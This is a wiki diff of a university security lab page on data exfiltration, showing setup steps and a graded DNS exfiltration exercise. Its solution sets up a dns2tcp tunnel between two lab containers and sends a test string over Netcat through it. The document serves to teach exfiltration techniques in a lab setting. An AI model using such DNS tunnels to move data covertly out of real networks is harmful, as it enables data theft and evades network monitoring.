Differences
This shows you the differences between two versions of the page.
|
cdci:labs:6 [2020/03/17 01:40] mihai.chiroiu [07. [20p] DNS exfiltration] |
cdci:labs:6 [2024/05/10 14:22] (current) mihai.chiroiu [01. [5p] Virtual machine setup] |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Lab06. Data exfiltration ====== | ====== Lab06. Data exfiltration ====== | ||
| + | |||
| + | <note warning> | ||
| + | Important read to be graded! | ||
| + | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
| + | </note> | ||
| ===== Objectives ===== | ===== Objectives ===== | ||
| Line 22: | Line 27: | ||
| git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | ||
| git config user.email "student@upb.ro" | git config user.email "student@upb.ro" | ||
| + | </code> | ||
| + | |||
| + | Now we need to build some docker containers | ||
| + | <code> | ||
| + | root@cdci:/# cd cdci/containers/exfiltration_lab06/ | ||
| + | root@cdci:/# make | ||
| </code> | </code> | ||
| Line 193: | Line 204: | ||
| ==== 07. [20p] DNS exfiltration ==== | ==== 07. [20p] DNS exfiltration ==== | ||
| - | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is dns2tcp. Use the following configuration for the client/server side. | + | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side. |
| * Client side configuration | * Client side configuration | ||
| <code> | <code> | ||
| Line 219: | Line 230: | ||
| <solution> | <solution> | ||
| <code> | <code> | ||
| + | root@h2:/# dns2tcpd -f .dns2tcpdrc | ||
| + | root@h2:/# netstat -nlup | ||
| + | Active Internet connections (only servers) | ||
| + | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
| + | udp 0 0 0.0.0.0:53 0.0.0.0:* 428/dns2tcpd | ||
| + | root@h2:/# nc -l -p 8080 -k | ||
| + | TEST | ||
| + | |||
| + | root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 & | ||
| + | [2] 196 | ||
| + | root@h1:/# Listening on port : 8080 | ||
| + | root@h1:/# netstat -nltp | ||
| + | Active Internet connections (only servers) | ||
| + | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
| + | tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 196/dns2tcpc | ||
| + | root@h1:/# nc 127.0.0.1 8080 | ||
| + | TEST | ||
| + | ^C | ||
| </code> | </code> | ||
| </solution> | </solution> | ||
